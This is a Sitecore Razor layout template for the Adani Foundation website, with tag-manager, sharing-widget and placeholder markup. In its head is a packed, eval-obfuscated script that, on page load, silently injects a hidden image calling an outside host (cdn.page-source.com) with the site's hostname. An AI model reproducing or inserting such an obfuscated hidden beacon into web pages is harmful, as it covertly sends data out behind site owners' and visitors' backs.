@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@using Sitecore.Foundation.Website.Helper
@using SitecoreBundler
@inherits WebViewPage
@{
    Layout = null;
	var urlOptions = new Sitecore.Links.UrlOptions();
	urlOptions.AlwaysIncludeServerUrl = true;
	var currentUrl = Sitecore.Links.LinkManager.GetItemUrl(Sitecore.Context.Item, urlOptions);
	currentUrl = currentUrl.Replace(":443", string.Empty);
	var imgurl = Helper.ImageUrl("BannerImage", Sitecore.Context.Item);
}
<!doctype html>
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<head>
    @Html.Sitecore().VisitorIdentification()


    <script nonce="9126c7fbab">
    (function (w, d, s, l, i) {
            w[l] = w[l] || []; w[l].push({
                'gtm.start':

                    new Date().getTime(), event: 'gtm.js'
            }); var f = d.getElementsByTagName(s)[0],

                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =

                    'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);

        })(window, document, 'script', 'dataLayer', 'GTM-P4B934N');</script>

    <!-- End Google Tag Manager -->

    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; object-src 'none' ; script-src 'self'  https://*.adanifoundation.org/  https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://www.googletagmanager.com/gtag/ https://www.google-analytics.com https://www.gstatic.com https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-9126c7fbab' 'nonce-9126c7fma9' 'nonce-9126c7fmki' 'nonce-9126c7fkii' ; style-src 'self' https://*.adanifoundation.org/ ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/  https://*.adanifoundation.org/ https://*.google.com https://www.google.co.in https://i.ytimg.com;   font-src 'self'  https://*.adanifoundation.org/ data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/  https://*.adanifoundation.org/ https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com  https://cdn.embedly.com  https://platform.twitter.com/ https://s7.addthis.com/ />


    @*<meta name="robots" content="index, follow">*@


    @Html.Sitecore().Placeholder("head")
    <link rel="icon" type="image/png" href="/images/Foundation/favicon.png" />

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)
    @Html.Sitecore().Bundle("adani-foundation-styles-min.css")
    <!-- Bootstrap core CSS -->
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&amp;render=explicit" async="" defer=""></script>
    <script async src="//cdn.embedly.com/widgets/platform.js" charset="UTF-8"></script>
    <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7"></script>
    @if (Sitecore.Context.Item.ID.ToString() == "{3A455CE2-F498-4DD0-9E04-2CAE76484ED7}")
    {
        <script type="text/javascript">
            var getText = @Html.Sitecore().Field("BrowserTitle", Sitecore.Context.Item);
            getText = getText + " by @@AdaniFoundation";
            var addthis_share = addthis_share || {}
            addthis_share = {
                passthrough: {
                    twitter: {
                        text: getText
                    }
                }
            }
        </script>
    }
    else
    {
        <script nonce="9126c7fma9" type="text/javascript">
            var pathArray = window.location.pathname.split('/');
            var getText = pathArray[pathArray.length - 1].replace(/-/g, " ");
            getText = "AdaniFoundation - " + getText + " by @@AdaniFoundation";
            var addthis_share = addthis_share || {}
            addthis_share = {
                passthrough: {
                    twitter: {
                        text: getText
                    }
                }
            }
        </script>
    }
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c109ddafa1c05a7"></script>

    <!--[if IE 9]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie9.min.css" rel="stylesheet">
    <![endif]-->
    <!--[if lte IE 8]>
      <link href="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/css/bootstrap-ie8.min.css" rel="stylesheet">
      <script src="https://cdn.jsdelivr.net/g/html5shiv@3.7.3"></script>
    <![endif]-->
    <script nonce="9126c7fmki">
        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>


</head>
<body>


<noscript><iframe src=https://www.googletagmanager.com/ns.html?id=GTM-P4B934N

height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<!-- End Google Tag Manager (noscript) -->

    <!-- Header -->
    @Html.Sitecore().Placeholder("header")
    <!-- /Header -->
    <!--  Main content Section-->
    <main>
		@Html.Sitecore().Placeholder("image-breadcrumb")
        @Html.Sitecore().Placeholder("main")
    </main>
    <!--  /Main content Section-->
    <!-- Footer -->
    @Html.Sitecore().Placeholder("footer")
    <!-- /Footer -->
    <!-- Bootstrap core JavaScript
    ================================================== -->

    @*RenderAssetsService.Current.RenderScript(ScriptLocation.Body)*@
	@*Html.Sitecore().Bundle("Adani-Foundation-frameworks.js")*@
	@Html.Sitecore().Bundle("Adani-Foundation-vendor.js")
	<!-- script -->
    @Html.RenderFormScripts()
    <script nonce="9126c7fkii">
        AOS.init();
    </script>
    <!--[if lte IE 8]>
      <script src="https://code.jquery.com/jquery-1.12.4.min.js"></script>
      <script src="https://cdn.jsdelivr.net/gh/coliff/bootstrap-ie8/js/bootstrap-ie8.js"></script>
      <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.js"></script>
    <![endif]-->


</body>
</html>
